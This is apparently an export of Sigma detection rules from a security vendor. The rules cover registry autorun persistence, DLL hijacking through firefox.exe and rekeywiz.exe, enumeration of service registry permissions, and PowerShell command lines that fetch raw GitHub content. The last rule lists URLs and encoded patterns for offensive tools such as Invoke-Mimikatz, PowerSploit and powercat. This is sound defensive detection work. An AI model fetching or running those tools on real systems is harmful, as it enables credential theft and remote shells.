exclusion_autocad:\n Details|contains: 'rundll32.exe ?:\\windows\\system32\\advpack.dll,DelNodeRunDLL32 \"?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*.tmp\\\\*'\n\n exclusion_graphisoft:\n ProcessImage: '?:\\Program Files\\GRAPHISOFT\\BIMx Desktop Viewer\\Uninstall.BIMx\\uninstaller.exe'\n Details: 'cmd.exe /C del \"?:\\windows\\Temp\\LaunchAR.exe\"'\n\n exclusion_teams:\n TargetObject|endswith: '\\Microsoft\\Windows\\CurrentVersion\\Run\\com.squirrel.Teams.Teams' # MS teams\n Details|contains: 'AppData\\Local\\Microsoft\\Teams\\Update.exe'\n\n exclusion_teamviewer:\n ProcessImage|endswith: '\\AppData\\Roaming\\TeamViewerMeeting\\TeamViewerMeeting.exe'\n Details|contains: '\\AppData\\Roaming\\TeamViewerMeeting\\TeamViewerMeeting.exe'\n\n exclusion_alcatel:\n ProcessImage|endswith: '\\AppData\\Local\\Programs\\Alcatel-Lucent Enterprise\\Rainbow\\Rainbow.exe'\n Details|contains: '\\AppData\\Local\\Programs\\Alcatel-Lucent Enterprise\\Rainbow\\Rainbow.exe'\n\n exclusion_razer:\n Details: '?:\\Program Files (x86)\\Razer\\\\*\\RzInstallerDeletion*.vbs'\n ProcessSigned: 'true'\n ProcessSignature: 'Razer USA Ltd.'\n\n exclusion_hp_delivery:\n ProcessImage: '?:\\Windows\\System32\\MsiExec.exe'\n Details: 'Rundll32.exe printui.dll,PrintUIEntry /m \"HP Delivery Driver V4\" /dd /q'\n\n exclusion_gadata:\n ProcessImage: '?:\\Program Files (x86)\\G Data\\AVKClient\\AVKWCtlx64.exe'\n Details|startswith: 'undll32.exe \"?:\\Program Files (x86)\\Common Files\\G DATA\\AVKProxy\\'\n\n exclusion_pdf_pro_suite:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\PDFProSuite\\pdfprosuite.exe'\n Details: 'cmd.exe /c \"start /min /d \"?:\\Users\\\\*\\AppData\\Local\\PDFProSuite\" PDFProSuite . --update\"'\n\n exclusion_ivanti:\n ProcessImage: '?:\\program files (x86)\\ivanti\\workspace control\\pfwsmgr.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Ivanti, Inc.'\n\n exclusion_drvinst:\n ProcessImage: '?:\\Windows\\System32\\drvinst.exe'\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\'\n\n exclusion_beyondtrust:\n ProcessImage|endswith:\n - '\\sra-scc.exe'\n - '\\sra-con.exe'\n - '\\sra-pin.exe'\n - '\\bomgar-scc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'BeyondTrust Corporation'\n TargetObject|contains: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Sra_Cleanup_ZD'\n\n exclusion_nch_software:\n ProcessImage|endswith: '\\AppData\\Roaming\\NCH Software\\Program Files\\\\*\\\\*.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NCH Software, Inc.'\n TargetObject|endswith:\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\*RunOnStartup'\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\*UpdateCheck'\n\n exclusion_modplus:\n ProcessImage|endswith: '\\AppData\\Roaming\\ModPlus\\mpAutoUpdater.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'IP Pekshev Alexander Aleksandrovich'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ModPlusAutoUpdater'\n\n exclusion_schneider:\n TargetObject|endswith:\n - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\ ISSetupPrerequisistes' # with a space before ISS\n - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\ ISSetupPrerequisistes' # with 2 spaces before ISS\n\n exclusion_asus:\n ProcessOriginalFileName: 'SmatData.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\CS Dispatch'\n\n exclusion_lifen:\n ProcessImage|endswith: '\\Default\\AppData\\Local\\lifen\\app-*\\Lifen.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Honestica'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\com.squirrel.lifen.Lifen'\n\n exclusion_bimandco:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Roaming\\BimAndCo\\StandAloneApp\\BimAndCo.StandAloneApp.exe'\n ProcessOriginalFileName: 'BimAndCo.StandAloneApp.dll'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\StandAloneApp'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fd2e4d65-00d6-4661-a5f4-ad92fe8d4540",
"rule_name": "Suspicious Registry Autorun Key Added",
"rule_description": "Detects when a suspicious entry is added or modified in one of the autostart extensibility points (ASEP) in the registry, which may indicate an attempt to establish persistence.\nAutostart extensibility points are registry locations that Windows uses to automatically execute programs during system startup or user logon. Common ASEP locations include Run and RunOnce keys under \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" and \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\". Attackers frequently abuse these registry keys to achieve persistence by adding entries that reference malicious executables, scripts, or commands. This technique allows malware to survive system reboots and maintain a foothold on the compromised system without requiring user interaction.\nIt is recommended to investigate the process that created or modified the registry key, examine the target executable or command referenced in the registry value and verify whether the entry corresponds to legitimate software.\n",
"rule_creation_date": "2023-06-22",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1547.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fd9b7646-9c2d-41c6-8580-5ad80591e94c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079012Z",
"creation_date": "2026-03-23T11:45:34.079014Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079019Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_firefox.yml",
"content": "title: DLL Hijacking via Firefox\nid: fd9b7646-9c2d-41c6-8580-5ad80591e94c\ndescription: |\n Detects potential Windows DLL Hijacking via firefox.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'firefox.exe'\n ProcessSignature: 'Mozilla Corporation'\n ImageLoaded|endswith:\n - '\\dataexchange.dll'\n - '\\explorerframe.dll'\n - '\\mswsock.dll'\n - '\\netprofm.dll'\n - '\\propsys.dll'\n - '\\rsaenh.dll'\n - '\\rasadhlp.dll'\n - '\\windows.storage.dll'\n - '\\winrnr.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fd9b7646-9c2d-41c6-8580-5ad80591e94c",
"rule_name": "DLL Hijacking via Firefox",
"rule_description": "Detects potential Windows DLL Hijacking via firefox.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fda8f576-7252-48e1-8518-31282f360d7b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072275Z",
"creation_date": "2026-03-23T11:45:34.072277Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072281Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness",
"https://attack.mitre.org/techniques/T1574/011/"
],
"name": "t1574_011_service_registry_permissions_weakness_check.yml",
"content": "title: Services Registry Permissions Enumerated via PowerShell\nid: fda8f576-7252-48e1-8518-31282f360d7b\ndescription: |\n Detects when the Get-Acl PowerShell command is used alongside the Services registry path to get the security parameters of a service's registry keys.\n Adversaries can use this method to find services with weak parameters and modify their settings to establish persistence and/or privilege escalation.\n It is recommended to investigate the context in which this command was executed to determine legitimacy.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness\n - https://attack.mitre.org/techniques/T1574/011/\ndate: 2022/12/23\nmodified: 2025/11/04\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.011\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.Exploitation\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|re:\n - '(?i)get-acl [[:print:]]+\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\'\n - '(?i)get-acl -P[ath]{0,3} [[:print:]]+\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\'\n\n exclusion_ivanti:\n ProcessParentImage: '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\Respesvc64.exe'\n\n # https://learn.microsoft.com/en-us/troubleshoot/windows-client/windows-tss/introduction-to-troubleshootingscript-toolset-tss\n exclusion_tss:\n PowershellCommand|contains|all:\n - 'module for collecting ETW traces and various custom tracing functionality'\n - 'TSS https://internal.evergreen.microsoft.com/en-us/help/4619187'\n - '<# latest changes'\n - '#region --- ETW component trace Providers ---'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fda8f576-7252-48e1-8518-31282f360d7b",
"rule_name": "Services Registry Permissions Enumerated via PowerShell",
"rule_description": "Detects when the Get-Acl PowerShell command is used alongside the Services registry path to get the security parameters of a service's registry keys.\nAdversaries can use this method to find services with weak parameters and modify their settings to establish persistence and/or privilege escalation.\nIt is recommended to investigate the context in which this command was executed to determine legitimacy.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2025-11-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fe0026b0-367c-4484-8488-18b8d913226b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076911Z",
"creation_date": "2026-03-23T11:45:34.076913Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076917Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rekeywiz.yml",
"content": "title: DLL Hijacking via rekeywiz.exe\nid: fe0026b0-367c-4484-8488-18b8d913226b\ndescription: |\n Detects potential Windows DLL Hijacking via rekeywiz.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rekeywiz.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\credui.dll'\n - '\\CRYPTBASE.DLL'\n - '\\CRYPTUI.dll'\n - '\\DSROLE.dll'\n - '\\duser.dll'\n - '\\EFSADU.dll'\n - '\\EFSUTIL.dll'\n - '\\FeClient.dll'\n - '\\logoncli.dll'\n - '\\mpr.dll'\n - '\\netutils.dll'\n - '\\USERENV.dll'\n - '\\VAULTCLI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fe0026b0-367c-4484-8488-18b8d913226b",
"rule_name": "DLL Hijacking via rekeywiz.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rekeywiz.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fe179170-1bf7-4cc0-815e-3a0021d10561",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608639Z",
"creation_date": "2026-03-23T11:45:34.608642Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608649Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://cyble.com/blog/winrar-flaw-exposes-users-to-apanyan-asyncrat-murk/",
"https://attack.mitre.org/techniques/T1102/003/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_suspicious_urls_cmd.yml",
"content": "title: URLs of Suspicious Code Repository in PowerShell Command-line\nid: fe179170-1bf7-4cc0-815e-3a0021d10561\ndescription: |\n Detects URLs to suspicious code repositories in PowerShell command-lines.\n These are usually existing, legitimate external Web services like Github that allow users to host content.\n Popular websites and social media may give cover to adversaries, due to hosts communicating to these domains before being compromised.\n Adversaries can use these domains to send commands or upload payloads to a compromised system.\n It is recommended to investigate the URL contained in the PowerShell command-line to look whether it is pointing to a legitimate code repositories.\nreferences:\n - https://cyble.com/blog/winrar-flaw-exposes-users-to-apanyan-asyncrat-murk/\n - https://attack.mitre.org/techniques/T1102/003/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/08/18\nmodified: 2025/01/17\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102.003\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.NetworkActivity\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_powershell:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n\n selection_suspicious_args:\n CommandLine|contains:\n # generic raw githubusercontent , this is oftently malicious stuff\n - '/raw.githubusercontent.com/'\n # /raw.githubusercontent.com/ in UTF16-LE in base64 with 3 different offsets, for PowerShell command-lines\n - 'LwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8A'\n - '8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvA'\n - 'vAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALw'\n - '/gist.githubusercontent.com/'\n - 'LwBnAGkAcwB0AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALw'\n - '8AZwBpAHMAdAAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8A'\n - 'vAGcAaQBzAHQALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvA'\n\n # There is another rule for that\n exclusion_malicious:\n CommandLine|contains:\n # https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/Find-Fruit.ps1\n # https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1\n - '/S3cur3Th1sSh1t/'\n # /S3cur3Th1sSh1t/ in UTF16-LE in base64 with 3 different offsets, for PowerShell command-lines\n - 'LwBTADMAYwB1AHIAMwBUAGgAMQBzAFMAaAAxAHQALw'\n - '8AUwAzAGMAdQByADMAVABoADEAcwBTAGgAMQB0AC8A'\n - 'vAFMAMwBjAHUAcgAzAFQAaAAxAHMAUwBoADEAdAAvA'\n # 'https://raw.githubusercontent.com/pwnieexpress/Metasploit-framework/master/exploits/powershell/powerdump.ps1\n - '/pwnieexpress/'\n - 'LwBwAHcAbgBpAGUAZQB4AHAAcgBlAHMAcwAvA'\n - '8AcAB3AG4AaQBlAGUAeABwAHIAZQBzAHMALw'\n - 'vAHAAdwBuAGkAZQBlAHgAcAByAGUAcwBzAC8A'\n # https://raw.githubusercontent.com/EmpireProject/Empire/master/module_source/credentials/Invoke-Mimikatz.ps1\n - '/EmpireProject/'\n - 'LwBFAG0AcABpAHIAZQBQAHIAbwBqAGUAYwB0AC8A'\n - '8ARQBtAHAAaQByAGUAUAByAG8AagBlAGMAdAAvA'\n - 'vAEUAbQBwAGkAcgBlAFAAcgBvAGoAZQBjAHQALw'\n # https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1\n - '/PowerSploit/'\n - 'LwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALw'\n - '8AUABvAHcAZQByAFMAcABsAG8AaQB0AC8A'\n - 'vAFAAbwB3AGUAcgBTAHAAbABvAGkAdAAvA'\n # https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1\n - '/clymb3r/'\n - 'LwBjAGwAeQBtAGIAMwByAC8A'\n - '8AYwBsAHkAbQBiADMAcgAvA'\n - 'vAGMAbAB5AG0AYgAzAHIALw'\n - '/Invoke-Mimikatz/'\n - 'LwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAvA'\n - '8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALw'\n - 'vAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC8A'\n # https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1\n - '/BloodHoundAD/'\n - 'LwBCAGwAbwBvAGQASABvAHUAbgBkAEEARAAvA'\n - '8AQgBsAG8AbwBkAEgAbwB1AG4AZABBAEQALw'\n - 'vAEIAbABvAG8AZABIAG8AdQBuAGQAQQBEAC8A'\n # https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1\n - '/Kevin-Robertson/'\n - 'LwBLAGUAdgBpAG4ALQBSAG8AYgBlAHIAdABzAG8AbgAvA'\n - '8ASwBlAHYAaQBuAC0AUgBvAGIAZQByAHQAcwBvAG4ALw'\n - 'vAEsAZQB2AGkAbgAtAFIAbwBiAGUAcgB0AHMAbwBuAC8A'\n # https://raw.githubusercontent.com/Veil-Framework/Veil-Pillage/master/data/PowerSploit/Invoke-Mimikatz.ps1\n - '/Veil-Framework/'\n - 'LwBWAGUAaQBsAC0ARgByAGEAbQBlAHcAbwByAGsALw'\n - '8AVgBlAGkAbAAtAEYAcgBhAG0AZQB3AG8AcgBrAC8A'\n - 'vAFYAZQBpAGwALQBGAHIAYQBtAGUAdwBvAHIAawAvA'\n # https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/Get-SPN/Get-SPN.psm1\n - '/nullbind/Powershellery/'\n - 'LwBuAHUAbABsAGIAaQBuAGQALwBQAG8AdwBlAHIAcwBoAGUAbABsAGUAcgB5AC8A'\n - '8AbgB1AGwAbABiAGkAbgBkAC8AUABvAHcAZQByAHMAaABlAGwAbABlAHIAeQAvA'\n - 'vAG4AdQBsAGwAYgBpAG4AZAAvAFAAbwB3AGUAcgBzAGgAZQBsAGwAZQByAHkALw'\n # https://gist.githubusercontent.com/shantanu561993/6483e524dc225a188de04465c8512909/raw/db219421ea911b820e9a484754f03a26fbfb9c27/AMSI_bypass_Reflection.ps1\n - '/shantanu561993/'\n - 'LwBzAGgAYQBuAHQAYQBuAHUANQA2ADEAOQA5ADMALw'\n - '8AcwBoAGEAbgB0AGEAbgB1ADUANgAxADkAOQAzAC8A'\n - 'vAHMAaABhAG4AdABhAG4AdQA1ADYAMQA5ADkAMwAvA'\n # https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1\n - '/powercat/'\n - 'LwBwAG8AdwBlAHIAYwBhAHQALw'\n - '8AcABvAHcAZQByAGMAYQB0AC8A'\n - 'vAHAAbwB3AGUAcgBjAGEAdAAvA'\n # https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Start-Eidolon.ps1\n - '/FuzzySecurity/PowerShell-Suite/'\n - 'LwBGAHUAegB6AHkAUwBlAGMAdQByAGkAdAB5AC8AUABvAHcAZQByAFMAaABlAGwAbAAtAFMAdQBpAHQAZQAvA'\n - '8ARgB1AHoAegB5AFMAZQBjAHUAcgBpAHQAeQAvAFAAbwB3AGUAcgBTAGgAZQBsAGwALQBTAHUAaQB0AGUALw'\n - 'vAEYAdQB6AHoAeQBTAGUAYwB1AHIAaQB0AHkALwBQAG8AdwBlAHIAUwBoAGUAbABsAC0AUwB1AGkAdABlAC8A'\n # https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1\n - '/The-Viper-One/'\n - 'LwBUAGgAZQAtAFYAaQBwAGUAcgAtAE8AbgBlAC8A'\n - '8AVABoAGUALQBWAGkAcABlAHIALQBPAG4AZQAvA'\n - 'vAFQAaABlAC0AVgBpAHAAZQByAC0ATwBuAGUALw'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fe179170-1bf7-4cc0-815e-3a0021d10561",
"rule_name": "URLs of Suspicious Code Repository in PowerShell Command-line",
"rule_description": "Detects URLs to suspicious code repositories in PowerShell command-lines.\nThese are usually existing, legitimate external Web services like Github that allow users to host content.\nPopular websites and social media may give cover to adversaries, due to hosts communicating to these domains before being compromised.\nAdversaries can use these domains to send commands or upload payloads to a compromised system.\nIt is recommended to investigate the URL contained in the PowerShell command-line to look whether it is pointing to a legitimate code repositories.\n",
"rule_creation_date": "2022-08-18",
"rule_modified_date": "2025-01-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1102.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fe310d5f-8420-465b-a622-8a6959b418ac",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
